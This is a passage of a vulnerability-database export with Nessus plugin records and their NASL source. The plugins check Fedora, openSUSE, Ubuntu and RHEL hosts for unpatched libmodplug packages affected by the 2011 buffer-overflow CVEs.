value:\"https://bugzilla.redhat.com/show_bug.cgi?id=728371\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-August/063786.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e8739c01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libmodplug package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libmodplug\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:14\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/08/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^14([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 14.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC14\", reference:\"libmodplug-0.8.8.4-1.fc14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmodplug\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:07:03", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=710726", "http://lists.opensuse.org/opensuse-updates/2011-08/msg00035.html"], "pluginID": "75586", "description": "This update of libmodplug0 fixes the following issues :\n\n1) An integer overflow error exists within the 'CSoundFile::ReadWav()' function (src/load_wav.cpp) when processing certain WAV files. This can be exploited to cause a heap-based buffer overflow by tricking a user into opening a specially crafted WAV file. (CVE-2011-2911)\n\n2) Boundary errors within the 'CSoundFile::ReadS3M()' function (src/load_s3m.cpp) when processing S3M files can be exploited to cause stack-based buffer overflows by tricking a user into opening a specially crafted S3M file. (CVE-2011-2912)\n\n3) An off-by-one error within the 'CSoundFile::ReadAMS()' function (src/load_ams.cpp) can be exploited to cause a stack corruption by tricking a user into opening a specially crafted AMS file.\n(CVE-2011-2913)\n\n4) An off-by-one error within the 'CSoundFile::ReadDSM()' function (src/load_dms.cpp) can be exploited to cause a memory corruption by tricking a user into opening a specially crafted DSM file.\n(CVE-2011-2914)\n\n5) An off-by-one error within the 'CSoundFile::ReadAMS2()' function (src/load_ams.cpp) can be exploited to cause a memory corruption by tricking a user into opening a specially crafted AMS file.\n(CVE-2011-2915)\n\nAlso an overflow in the ABC loader was fixed. (CVE-2011-1761)", "edition": 4, "reporter": "Tenable", "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : libmodplug (openSUSE-SU-2011:0943-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-1761", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libmodplug0", "p-cpe:/a:novell:opensuse:libmodplug0-32bit", "p-cpe:/a:novell:opensuse:libmodplug-devel", "cpe:/o:novell:opensuse:11.3"], "id": "SUSE_11_3_LIBMODPLUG-110816.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=75586", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update libmodplug-5004.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75586);\n script_version(\"$Revision: 1.1 $\");\n script_cvs_date(\"$Date: 2014/06/13 21:55:23 $\");\n\n script_cve_id(\"CVE-2011-1761\", \"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n\n script_name(english:\"openSUSE Security Update : libmodplug (openSUSE-SU-2011:0943-1)\");\n script_summary(english:\"Check for the libmodplug-5004 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of libmodplug0 fixes the following issues :\n\n1) An integer overflow error exists within the 'CSoundFile::ReadWav()'\nfunction (src/load_wav.cpp) when processing certain WAV files. This\ncan be exploited to cause a heap-based buffer overflow by tricking a\nuser into opening a specially crafted WAV file. (CVE-2011-2911)\n\n2) Boundary errors within the 'CSoundFile::ReadS3M()' function\n(src/load_s3m.cpp) when processing S3M files can be exploited to cause\nstack-based buffer overflows by tricking a user into opening a\nspecially crafted S3M file. (CVE-2011-2912)\n\n3) An off-by-one error within the 'CSoundFile::ReadAMS()' function\n(src/load_ams.cpp) can be exploited to cause a stack corruption by\ntricking a user into opening a specially crafted AMS file.\n(CVE-2011-2913)\n\n4) An off-by-one error within the 'CSoundFile::ReadDSM()' function\n(src/load_dms.cpp) can be exploited to cause a memory corruption by\ntricking a user into opening a specially crafted DSM file.\n(CVE-2011-2914)\n\n5) An off-by-one error within the 'CSoundFile::ReadAMS2()' function\n(src/load_ams.cpp) can be exploited to cause a memory corruption by\ntricking a user into opening a specially crafted AMS file.\n(CVE-2011-2915)\n\nAlso an overflow in the ABC loader was fixed. (CVE-2011-1761)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.opensuse.org/opensuse-updates/2011-08/msg00035.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=710726\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libmodplug packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmodplug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmodplug0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmodplug0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/08/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libmodplug-devel-0.8.8.4-2.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libmodplug0-0.8.8.4-2.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", cpu:\"x86_64\", reference:\"libmodplug0-32bit-0.8.8.4-2.2.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmodplug\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:56:53", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=710726", "http://lists.opensuse.org/opensuse-updates/2011-08/msg00035.html"], "pluginID": "75902", "description": "This update of libmodplug0 fixes the following issues :\n\n1) An integer overflow error exists within the 'CSoundFile::ReadWav()' function (src/load_wav.cpp) when processing certain WAV files. This can be exploited to cause a heap-based buffer overflow by tricking a user into opening a specially crafted WAV file. (CVE-2011-2911)\n\n2) Boundary errors within the 'CSoundFile::ReadS3M()' function (src/load_s3m.cpp) when processing S3M files can be exploited to cause stack-based buffer overflows by tricking a user into opening a specially crafted S3M file. (CVE-2011-2912)\n\n3) An off-by-one error within the 'CSoundFile::ReadAMS()' function (src/load_ams.cpp) can be exploited to cause a stack corruption by tricking a user into opening a specially crafted AMS file.\n(CVE-2011-2913)\n\n4) An off-by-one error within the 'CSoundFile::ReadDSM()' function (src/load_dms.cpp) can be exploited to cause a memory corruption by tricking a user into opening a specially crafted DSM file.\n(CVE-2011-2914)\n\n5) An off-by-one error within the 'CSoundFile::ReadAMS2()' function (src/load_ams.cpp) can be exploited to cause a memory corruption by tricking a user into opening a specially crafted AMS file.\n(CVE-2011-2915)\n\nAlso an overflow in the ABC loader was fixed. (CVE-2011-1761)", "edition": 4, "reporter": "Tenable", "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : libmodplug (openSUSE-SU-2011:0943-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-1761", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libmodplug0-debuginfo", "p-cpe:/a:novell:opensuse:libmodplug0-debuginfo-32bit", "cpe:/o:novell:opensuse:11.4", "p-cpe:/a:novell:opensuse:libmodplug0", "p-cpe:/a:novell:opensuse:libmodplug-debugsource", "p-cpe:/a:novell:opensuse:libmodplug0-32bit", "p-cpe:/a:novell:opensuse:libmodplug-devel"], "id": "SUSE_11_4_LIBMODPLUG-110816.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=75902", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update libmodplug-5004.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75902);\n script_version(\"$Revision: 1.1 $\");\n script_cvs_date(\"$Date: 2014/06/13 22:10:33 $\");\n\n script_cve_id(\"CVE-2011-1761\", \"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n\n script_name(english:\"openSUSE Security Update : libmodplug (openSUSE-SU-2011:0943-1)\");\n script_summary(english:\"Check for the libmodplug-5004 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of libmodplug0 fixes the following issues :\n\n1) An integer overflow error exists within the 'CSoundFile::ReadWav()'\nfunction (src/load_wav.cpp) when processing certain WAV files. This\ncan be exploited to cause a heap-based buffer overflow by tricking a\nuser into opening a specially crafted WAV file. (CVE-2011-2911)\n\n2) Boundary errors within the 'CSoundFile::ReadS3M()' function\n(src/load_s3m.cpp) when processing S3M files can be exploited to cause\nstack-based buffer overflows by tricking a user into opening a\nspecially crafted S3M file. (CVE-2011-2912)\n\n3) An off-by-one error within the 'CSoundFile::ReadAMS()' function\n(src/load_ams.cpp) can be exploited to cause a stack corruption by\ntricking a user into opening a specially crafted AMS file.\n(CVE-2011-2913)\n\n4) An off-by-one error within the 'CSoundFile::ReadDSM()' function\n(src/load_dms.cpp) can be exploited to cause a memory corruption by\ntricking a user into opening a specially crafted DSM file.\n(CVE-2011-2914)\n\n5) An off-by-one error within the 'CSoundFile::ReadAMS2()' function\n(src/load_ams.cpp) can be exploited to cause a memory corruption by\ntricking a user into opening a specially crafted AMS file.\n(CVE-2011-2915)\n\nAlso an overflow in the ABC loader was fixed. (CVE-2011-1761)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.opensuse.org/opensuse-updates/2011-08/msg00035.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=710726\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libmodplug packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmodplug-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmodplug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmodplug0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmodplug0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmodplug0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmodplug0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/08/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libmodplug-debugsource-0.8.8.4-2.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libmodplug-devel-0.8.8.4-2.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libmodplug0-0.8.8.4-2.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libmodplug0-debuginfo-0.8.8.4-2.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libmodplug0-32bit-0.8.8.4-2.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libmodplug0-debuginfo-32bit-0.8.8.4-2.2.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmodplug\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:52:48", "references": [], "pluginID": "56767", "description": "Hossein Lotfi discovered that libmodplug did not correctly handle certain malformed media files. If a user or automated system were tricked into opening a crafted media file, an attacker could cause a denial of service or possibly execute arbitrary code with privileges of the user invoking the program. (CVE-2011-2911, CVE-2011-2912, CVE-2011-2913)\n\nIt was discovered that libmodplug did not correctly handle certain malformed media files. If a user or automated system were tricked into opening a crafted media file, an attacker could cause a denial of service or possibly execute arbitrary code with privileges of the user invoking the program. (CVE-2011-2914, CVE-2011-2915).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 5, "reporter": "Tenable", "published": "2011-11-10T00:00:00", "title": "Ubuntu 10.04 LTS / 10.10 / 11.04 / 11.10 : libmodplug vulnerabilities (USN-1255-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2018-08-01T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:11.10", "cpe:/o:canonical:ubuntu_linux:11.04", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:libmodplug0c2", "p-cpe:/a:canonical:ubuntu_linux:libmodplug1", "cpe:/o:canonical:ubuntu_linux:10.10"], "id": "UBUNTU_USN-1255-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=56767", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1255-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(56767);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/08/01 17:36:14\");\n\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_bugtraq_id(48979);\n script_xref(name:\"USN\", value:\"1255-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 10.10 / 11.04 / 11.10 : libmodplug vulnerabilities (USN-1255-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Hossein Lotfi discovered that libmodplug did not correctly handle\ncertain malformed media files. If a user or automated system were\ntricked into opening a crafted media file, an attacker could cause a\ndenial of service or possibly execute arbitrary code with privileges\nof the user invoking the program. (CVE-2011-2911, CVE-2011-2912,\nCVE-2011-2913)\n\nIt was discovered that libmodplug did not correctly handle certain\nmalformed media files. If a user or automated system were tricked into\nopening a crafted media file, an attacker could cause a denial of\nservice or possibly execute arbitrary code with privileges of the user\ninvoking the program. (CVE-2011-2914, CVE-2011-2915).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libmodplug0c2 and / or libmodplug1 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmodplug0c2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmodplug1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2011-2018 Canonical, Inc. / NASL script (C) 2011-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(10\\.04|10\\.10|11\\.04|11\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 10.10 / 11.04 / 11.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libmodplug0c2\", pkgver:\"1:0.8.7-1ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libmodplug1\", pkgver:\"1:0.8.8.1-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"libmodplug1\", pkgver:\"1:0.8.8.1-2ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"libmodplug1\", pkgver:\"1:0.8.8.2-3ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmodplug0c2 / libmodplug1\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:00:35", "references": ["https://www.redhat.com/security/data/cve/CVE-2011-2914.html", "http://rhn.redhat.com/errata/RHSA-2011-1264.html", "https://www.redhat.com/security/data/cve/CVE-2011-2913.html", "https://www.redhat.com/security/data/cve/CVE-2011-2912.html", "https://www.redhat.com/security/data/cve/CVE-2011-2915.html", "https://www.redhat.com/security/data/cve/CVE-2011-2911.html"], "pluginID": "56111", "description": "Updated gstreamer-plugins packages that fix multiple security issues are now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe gstreamer-plugins packages contain plug-ins used by the GStreamer streaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, a boundary error, and multiple off-by-one flaws were found in various ModPlug music file format library (libmodplug) modules, embedded in GStreamer. An attacker could create specially crafted music files that, when played by a victim, would cause applications using GStreamer to crash or, potentially, execute arbitrary code. (CVE-2011-2911, CVE-2011-2912, CVE-2011-2913, CVE-2011-2914, CVE-2011-2915)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated packages, which contain backported patches to correct these issues.\nAfter installing the update, all applications using GStreamer (such as Rhythmbox) must be restarted for the changes to take effect.", "edition": 5, "reporter": "Tenable", "published": "2011-09-07T00:00:00", "title": "RHEL 4 : gstreamer-plugins (RHSA-2011:1264)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2017-01-04T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:gstreamer-plugins", "p-cpe:/a:redhat:enterprise_linux:gstreamer-plugins-devel"], "id": "REDHAT-RHSA-2011-1264.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=56111", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:1264. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(56111);\n script_version (\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2017/01/04 16:02:23 $\");\n\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_bugtraq_id(48979);\n script_xref(name:\"RHSA\", value:\"2011:1264\");\n\n script_name(english:\"RHEL 4 : gstreamer-plugins (RHSA-2011:1264)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated gstreamer-plugins packages that fix multiple security issues\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe gstreamer-plugins packages contain plug-ins used by the GStreamer\nstreaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, a boundary error, and multiple off-by-one\nflaws were found in various ModPlug music file format library\n(libmodplug) modules, embedded in GStreamer. An attacker could create\nspecially crafted music files that, when played by a victim, would\ncause applications using GStreamer to crash or, potentially, execute\narbitrary code. (CVE-2011-2911, CVE-2011-2912, CVE-2011-2913,\nCVE-2011-2914, CVE-2011-2915)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues.\nAfter installing the update, all applications using GStreamer (such as\nRhythmbox) must be restarted for the changes to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-2911.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 